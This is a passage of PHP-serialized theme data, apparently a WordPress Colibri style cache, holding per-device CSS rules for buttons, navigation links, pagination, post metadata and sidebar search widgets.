height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:122;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:123;a:3:{s:7:\"desktop\";s:800:\"#colibri .style-123-icon {\n  width: 16px;\n  height: 16px;\n  margin-right: 0px;\n  margin-left: 5px;\n}\n#colibri .style-123 {\n  text-align: center;\n  font-family: Open Sans;\n  font-weight: 400;\n  font-size: 16px;\n  line-height: 1.6;\n  color: #03a9f4;\n  border-top-width: 2px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 2px;\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 2px;\n  border-left-style: none;\n}\n#colibri .style-123:hover,#colibri .style-123:focus {\n  color: rgb(2, 110, 159);\n}\n#colibri .style-123:active .style-123-icon {\n  width: 16px;\n  height: 16px;\n  margin-right: 0px;\n  margin-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:124;a:3:{s:7:\"desktop\";s:473:\"#colibri .style-124 {\n  border-top-width: 1px;\n  border-top-color: rgb(224, 224, 224);\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: rgb(224, 224, 224);\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: rgb(224, 224, 224);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: rgb(224, 224, 224);\n  border-left-style: solid;\n  margin-top: 45px;\n  margin-right: 30px;\n  margin-left: 30px;\n}\n\";s:6:\"tablet\";s:67:\"#colibri .style-124 {\n  margin-right: 10px;\n  margin-left: 10px;\n}\n\";s:6:\"mobile\";s:67:\"#colibri .style-124 {\n  margin-right: 10px;\n  margin-left: 10px;\n}\n\";}i:125;a:3:{s:7:\"desktop\";s:106:\"#colibri .style-125 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  padding-right: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:126;a:3:{s:7:\"desktop\";s:885:\"#colibri .style-126 .nav-links .prev-navigation a,#colibri .style-126 .nav-links .next-navigation a {\n  text-decoration: none;\n  color: rgb(51, 51, 51);\n  border-top-width: 2px;\n  border-top-color: black;\n  border-top-style: none;\n  border-top-left-radius: 0px;\n  border-top-right-radius: 0px;\n  border-right-width: 2px;\n  border-right-color: black;\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-color: black;\n  border-bottom-style: none;\n  border-bottom-left-radius: 0px;\n  border-bottom-right-radius: 0px;\n  border-left-width: 2px;\n  border-left-color: black;\n  border-left-style: none;\n}\n#colibri .style-126 .nav-links .prev-navigation a:hover,#colibri .style-126 .nav-links .next-navigation a:hover {\n  color: #03a9f4;\n}\n#colibri .style-126 .nav-links .prev-navigation a:hover,#colibri .style-126 .nav-links .next-navigation a:hover {\n  color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:127;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-127 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:128;a:3:{s:7:\"desktop\";s:296:\"#colibri .style-128 .page-numbers.current {\n  margin-right: 10px;\n  color: #03a9f4;\n}\n#colibri .style-128 .page-numbers {\n  margin-right: 10px;\n  color: rgb(51, 51, 51);\n}\n#colibri .style-128 .page-numbers:hover {\n  color: #03a9f4;\n}\n#colibri .style-128 .page-numbers:hover {\n  color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:129;a:3:{s:7:\"desktop\";s:105:\"#colibri .style-129 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  padding-left: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:130;a:3:{s:7:\"desktop\";s:913:\"#colibri .style-130 .nav-links .prev-navigation a,#colibri .style-130 .nav-links .next-navigation a {\n  text-decoration: none;\n  color: rgb(51, 51, 51);\n  border-top-width: 2px;\n  border-top-color: rgb(0, 0, 0);\n  border-top-style: none;\n  border-top-left-radius: 0px;\n  border-top-right-radius: 0px;\n  border-right-width: 2px;\n  border-right-color: rgb(0, 0, 0);\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-color: rgb(0, 0, 0);\n  border-bottom-style: none;\n  border-bottom-left-radius: 0px;\n  border-bottom-right-radius: 0px;\n  border-left-width: 2px;\n  border-left-color: rgb(0, 0, 0);\n  border-left-style: none;\n}\n#colibri .style-130 .nav-links .prev-navigation a:hover,#colibri .style-130 .nav-links .next-navigation a:hover {\n  color: #03a9f4;\n}\n#colibri .style-130 .nav-links .prev-navigation a:hover,#colibri .style-130 .nav-links .next-navigation a:hover {\n  color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:131;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:132;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:133;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-133 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:134;a:3:{s:7:\"desktop\";s:363:\"#colibri .style-134 p,#colibri .style-134  h1,#colibri .style-134  h2,#colibri .style-134  h3,#colibri .style-134  h4,#colibri .style-134  h5,#colibri .style-134  h6 {\n  font-size: 10em;\n  color: rgb(51, 51, 51);\n}\n#colibri .style-134 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:135;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:136;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:137;a:3:{s:7:\"desktop\";s:1300:\"#colibri .style-137-icon {\n  width: 16px;\n  height: 16px;\n  margin-right: 0px;\n  margin-left: 10px;\n}\n#colibri .style-137 {\n  background-color: rgba(3, 169, 244, 0);\n  background-image: none;\n  font-family: Open Sans;\n  font-weight: 400;\n  text-transform: none;\n  font-size: 16px;\n  line-height: 1.5em;\n  letter-spacing: 1px;\n  color: #03a9f4;\n  border-top-width: 2px;\n  border-top-color: #03a9f4;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 2px;\n  border-right-color: #03a9f4;\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-color: #03a9f4;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 2px;\n  border-left-color: #03a9f4;\n  border-left-style: none;\n  padding-top: 0px;\n  padding-right: 0px;\n  padding-bottom: 0px;\n  padding-left: 0px;\n  text-align: center;\n}\n#colibri .style-137:hover,#colibri .style-137:focus {\n  background-color: rgba(2, 110, 159, 0);\n  border-top-color: rgb(2, 110, 159);\n  border-right-color: rgb(2, 110, 159);\n  border-bottom-color: rgb(2, 110, 159);\n  border-left-color: rgb(2, 110, 159);\n}\n#colibri .style-137:active .style-137-icon {\n  width: 16px;\n  height: 16px;\n  margin-right: 0px;\n  margin-left: 10px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:138;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:139;a:3:{s:7:\"desktop\";s:67:\"#colibri .style-139 {\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:140;a:3:{s:7:\"desktop\";s:540:\"#colibri .style-140 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n  background-color: #FFFFFF;\n  background-image: none;\n  box-shadow: 0px 10px 40px 0px rgba(1, 51, 74, 0.15) ;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:141;a:3:{s:7:\"desktop\";s:46:\"#colibri .style-141 {\n  margin-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:142;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-142 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:143;a:3:{s:7:\"desktop\";s:444:\"#colibri .style-143 a,#colibri .style-143  .colibri-post-category {\n  margin-right: 10px;\n  text-transform: lowercase;\n  font-size: 14px;\n  color: rgb(153, 153, 153);\n}\n#colibri .style-143 a:hover,#colibri .style-143  .colibri-post-category:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-143 a:hover,#colibri .style-143  .colibri-post-category:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-143 .categories-prefix {\n  margin-right: 16px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:144;a:3:{s:7:\"desktop\";s:169:\"#colibri .style-144 h1,#colibri .style-144  h2,#colibri .style-144  h3,#colibri .style-144  h4,#colibri .style-144  h5,#colibri .style-144  h6 {\n  margin-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:145;a:3:{s:7:\"desktop\";s:583:\"#colibri .style-145 a {\n  text-decoration: none;\n  text-transform: lowercase;\n  font-size: 14px;\n  color: rgb(153, 153, 153);\n}\n#colibri .style-145 a:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-145 a:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-145 .metadata-prefix {\n  font-size: 14px;\n  color: rgb(102, 102, 102);\n}\n#colibri .style-145 .metadata-suffix {\n  font-size: 14px;\n  color: rgb(153, 153, 153);\n}\n#colibri .style-145 svg {\n  width: 24px ;\n  height: 24px;\n  margin-right: 5px;\n  display: none;\n}\n#colibri .style-145 .meta-separator {\n  color: rgb(153, 153, 153);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:146;a:3:{s:7:\"desktop\";s:75:\"#colibri .style-146 .colibri-post-excerpt {\n  color: rgb(102, 102, 102);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:147;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:148;a:3:{s:7:\"desktop\";s:562:\"#colibri .style-148-icon {\n  width: 16px;\n  height: 16px;\n  margin-right: 0px;\n  margin-left: 5px;\n}\n#colibri .style-148 {\n  text-align: center;\n  font-family: Open Sans;\n  font-weight: 400;\n  font-size: 16px;\n  line-height: 1.6;\n  color: #03a9f4;\n  border-top-style: none;\n  border-right-style: none;\n  border-bottom-style: none;\n  border-left-style: none;\n}\n#colibri .style-148:hover,#colibri .style-148:focus {\n  color: rgb(2, 110, 159);\n}\n#colibri .style-148:active .style-148-icon {\n  width: 16px;\n  height: 16px;\n  margin-right: 0px;\n  margin-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:149;a:3:{s:7:\"desktop\";s:473:\"#colibri .style-149 {\n  border-top-width: 1px;\n  border-top-color: rgb(224, 224, 224);\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: rgb(224, 224, 224);\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: rgb(224, 224, 224);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: rgb(224, 224, 224);\n  border-left-style: solid;\n  margin-top: 45px;\n  margin-right: 30px;\n  margin-left: 30px;\n}\n\";s:6:\"tablet\";s:67:\"#colibri .style-149 {\n  margin-right: 15px;\n  margin-left: 15px;\n}\n\";s:6:\"mobile\";s:67:\"#colibri .style-149 {\n  margin-right: 10px;\n  margin-left: 10px;\n}\n\";}i:150;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-150 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:151;a:3:{s:7:\"desktop\";s:106:\"#colibri .style-151 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  padding-right: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:152;a:3:{s:7:\"desktop\";s:889:\"#colibri .style-152 .nav-links .prev-navigation a,#colibri .style-152 .nav-links .next-navigation a {\n  text-decoration: none;\n  color: rgb(51, 51, 51);\n  border-top-width: 2px;\n  border-top-color: black;\n  border-top-style: none;\n  border-top-left-radius: 10px;\n  border-top-right-radius: 10px;\n  border-right-width: 2px;\n  border-right-color: black;\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-color: black;\n  border-bottom-style: none;\n  border-bottom-left-radius: 10px;\n  border-bottom-right-radius: 10px;\n  border-left-width: 2px;\n  border-left-color: black;\n  border-left-style: none;\n}\n#colibri .style-152 .nav-links .prev-navigation a:hover,#colibri .style-152 .nav-links .next-navigation a:hover {\n  color: #03a9f4;\n}\n#colibri .style-152 .nav-links .prev-navigation a:hover,#colibri .style-152 .nav-links .next-navigation a:hover {\n  color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:153;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-153 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:154;a:3:{s:7:\"desktop\";s:371:\"#colibri .style-154 .page-numbers.current {\n  margin-right: 10px;\n  font-size: 16px;\n  line-height: 1.6;\n  color: #03a9f4;\n}\n#colibri .style-154 .page-numbers {\n  margin-right: 10px;\n  font-size: 16px;\n  line-height: 1.6;\n  color: rgb(0, 0, 0);\n}\n#colibri .style-154 .page-numbers:hover {\n  color: #03a9f4;\n}\n#colibri .style-154 .page-numbers:hover {\n  color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:155;a:3:{s:7:\"desktop\";s:105:\"#colibri .style-155 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  padding-left: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:156;a:3:{s:7:\"desktop\";s:889:\"#colibri .style-156 .nav-links .prev-navigation a,#colibri .style-156 .nav-links .next-navigation a {\n  text-decoration: none;\n  color: rgb(51, 51, 51);\n  border-top-width: 2px;\n  border-top-color: black;\n  border-top-style: none;\n  border-top-left-radius: 10px;\n  border-top-right-radius: 10px;\n  border-right-width: 2px;\n  border-right-color: black;\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-color: black;\n  border-bottom-style: none;\n  border-bottom-left-radius: 10px;\n  border-bottom-right-radius: 10px;\n  border-left-width: 2px;\n  border-left-color: black;\n  border-left-style: none;\n}\n#colibri .style-156 .nav-links .prev-navigation a:hover,#colibri .style-156 .nav-links .next-navigation a:hover {\n  color: #03a9f4;\n}\n#colibri .style-156 .nav-links .prev-navigation a:hover,#colibri .style-156 .nav-links .next-navigation a:hover {\n  color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:157;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:158;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-158 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:159;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:160;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:161;a:3:{s:7:\"desktop\";s:104:\"#colibri .style-161 {\n  height: auto;\n  min-height: unset;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:162;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:163;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:164;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:165;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:166;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:167;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-167 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:168;a:3:{s:7:\"desktop\";s:2366:\"#colibri .style-168 {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-168 .widget {\n  text-align: left;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n  margin-bottom: 20px;\n}\n#colibri .style-168 .widget h1,#colibri .style-168 .widget h2,#colibri .style-168 .widget h3,#colibri .style-168 .widget h4,#colibri .style-168 .widget h5,#colibri .style-168 .widget h6 {\n  font-family: Open Sans;\n  font-weight: 600;\n  font-size: 16px;\n  line-height: 1.6;\n  color: rgb(0, 0, 0);\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n  margin-bottom: 10px;\n}\n#colibri .style-168 .widget ul,#colibri .style-168 .widget ol {\n  list-style-type: none;\n}\n#colibri .style-168 .widget ul li,#colibri .style-168 .widget ol li,#colibri .style-168 .widget  .textwidget p,#colibri .style-168 .widget  .calendar_wrap td ,#colibri .style-168  .widget  .calendar_wrap th ,#colibri .style-168  .widget  .calendar_wrap caption {\n  font-family: Open Sans;\n  font-weight: 400;\n  text-decoration: none;\n  font-size: 14px;\n  color: rgb(102, 102, 102);\n  padding-top: 4px;\n  padding-bottom: 4px;\n}\n#colibri .style-168 .widget ul li a {\n  font-family: Open Sans;\n  font-weight: 400;\n  text-decoration: none;\n  font-size: 14px;\n  color: rgb(102, 102, 102);\n}\n#colibri .style-168 .widget ul li a:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-168 .widget ul li a:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-168 .widget input:not([type=\"submit\"]) {\n  font-family: Open Sans;\n  font-weight: 400;\n  font-size: 16px;\n  color: rgb(102, 102, 102);\n  border-top-width: 0px;\n  border-top-color: black;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-color: black;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-color: black;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-color: black;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:54:\"#colibri .style-168 .widget {\n  text-align: center;\n}\n\";}i:169;a:3:{s:7:\"desktop\";s:3591:\"#colibri .style-168 .widget.widget_search {\n  background-color: unset;\n  background-image: none;\n  border-top-width: 1px;\n  border-top-color: rgb(238, 238, 238);\n  border-top-style: solid;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 1px;\n  border-right-color: rgb(238, 238, 238);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(238, 238, 238);\n  border-bottom-style: solid;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 1px;\n  border-left-color: rgb(238, 238, 238);\n  border-left-style: solid;\n  padding-top: 0px;\n  padding-right: 0px;\n  padding-bottom: 0px;\n  padding-left: 0px;\n  margin-bottom: 15px;\n}\n#colibri .style-168 .widget.widget_search h1,#colibri .style-168 .widget.widget_search h2,#colibri .style-168 .widget.widget_search h3,#colibri .style-168 .widget.widget_search h4,#colibri .style-168 .widget.widget_search h5,#colibri .style-168 .widget.widget_search h6 {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n  font-size: 16px;\n  color: rgb(0, 0, 0);\n}\n#colibri .style-168 .widget.widget_search input:not([type=\"submit\"]) {\n  padding-top: 10px;\n  padding-right: 12px;\n  padding-bottom: 10px;\n  padding-left: 12px;\n  font-size: 16px;\n  color: rgb(102, 102, 102);\n  background-color: rgb(249, 250, 251);\n  background-image: none;\n  border-top-width: 0px;\n  border-top-color: rgb(222, 222, 222);\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 0px;\n  border-right-width: 0px;\n  border-right-color: rgb(222, 222, 222);\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-color: rgb(222, 222, 222);\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 0px;\n  border-left-width: 0px;\n  border-left-color: rgb(222, 222, 222);\n  border-left-style: none;\n  margin-top: 0px;\n  margin-right: 0px;\n  margin-bottom: 0px;\n  margin-left: 0px;\n}\n#colibri .style-168 .widget.widget_search input:not([type=\"submit\"])::placeholder {\n  color: rgb(102, 102, 102);\n}\n#colibri .style-168 .widget.widget_search input[type=\"submit\"],#colibri .style-168 .widget.widget_search button[type=\"submit\"] {\n  background-color: rgb(249, 250, 251);\n  background-image: none;\n  font-size: 16px;\n  line-height: 1;\n  color: rgb(0, 0, 0);\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 0px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 0px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n  width: auto;\n  padding-top: 10px;\n  padding-right: 12px;\n  padding-bottom: 10px;\n  padding-left: 12px;\n  margin-top: 0px;\n  margin-right: 0px;\n  margin-bottom: 0px;\n  margin-left: 0px;\n  transition-duration: 0.5s;\n  display: inline-block;\n}\n#colibri .style-168 .widget.widget_search input[type=\"submit\"]:hover,#colibri .style-168 .widget.widget_search button[type=\"submit\"]:hover {\n  color: #03a9f4;\n}\n#colibri .style-168 .widget.widget_search input[type=\"submit\"]:hover,#colibri .style-168 .widget.widget_search button[type=\"submit\"]:hover {\n  color: #03a9f4;\n}\n#colibri .style-168 .widget.widget_search input[type=\"submit\"] {\n  display: none;\n}\n#colibri .style-168 .widget.widget_search button[type=\"submit\"] {\n  display: inline-block;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:170;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:171;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:172;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:173;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:174;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:175;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:176;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:177;a:3:{s:7:\"desktop\";s:104:\"#colibri .style-177 {\n  height: auto;\n  min-height: unset;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:178;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:179;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:180;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:181;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:182;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:183;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-183 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:184;a:3:{s:7:\"desktop\";s:2366:\"#colibri .style-184 {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-184 .widget {\n  text-align: left;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n  margin-bottom: 20px;\n}\n#colibri .style-184 .widget h1,#colibri .style-184 .widget h2,#colibri .style-184 .widget h3,#colibri .style-184 .widget h4,#colibri .style-184 .widget h5,#colibri .style-184 .widget h6 {\n  font-family: Open Sans;\n  font-weight: 600;\n  font-size: 16px;\n  line-height: 1.6;\n  color: rgb(0, 0, 0);\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n  margin-bottom: 10px;\n}\n#colibri .style-184 .widget ul,#colibri .style-184 .widget ol {\n  list-style-type: none;\n}\n#colibri .style-184 .widget ul li,#colibri .style-184 .widget ol li,#colibri .style-184 .widget  .textwidget p,#colibri .style-184 .widget  .calendar_wrap td ,#colibri .style-184  .widget  .calendar_wrap th ,#colibri .style-184  .widget  .calendar_wrap caption {\n  font-family: Open Sans;\n  font-weight: 400;\n  text-decoration: none;\n  font-size: 14px;\n  color: rgb(102, 102, 102);\n  padding-top: 4px;\n  padding-bottom: 4px;\n}\n#colibri .style-184 .widget ul li a {\n  font-family: Open Sans;\n  font-weight: 400;\n  text-decoration: none;\n  font-size: 14px;\n  color: rgb(102, 102, 102);\n}\n#colibri .style-184 .widget ul li a:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-184 .widget ul li a:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-184 .widget input:not([type=\"submit\"]) {\n  font-family: Open Sans;\n  font-weight: 400;\n  font-size: 16px;\n  color: rgb(102, 102, 102);\n  border-top-width: 0px;\n  border-top-color: black;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-color: black;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-color: black;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-color: black;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:54:\"#colibri .style-184 .widget {\n  text-align: center;\n}\n\";}i:185;a:3:{s:7:\"desktop\";s:3591:\"#colibri .style-184 .widget.widget_search {\n  background-color: unset;\n  background-image: none;\n  border-top-width: 1px;\n  border-top-color: rgb(238, 238, 238);\n  border-top-style: solid;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 1px;\n  border-right-color: rgb(238, 238, 238);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(238, 238, 238);\n  border-bottom-style: solid;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 1px;\n  border-left-color: rgb(238, 238, 238);\n  border-left-style: solid;\n  padding-top: 0px;\n  padding-right: 0px;\n  padding-bottom: 0px;\n  padding-left: 0px;\n  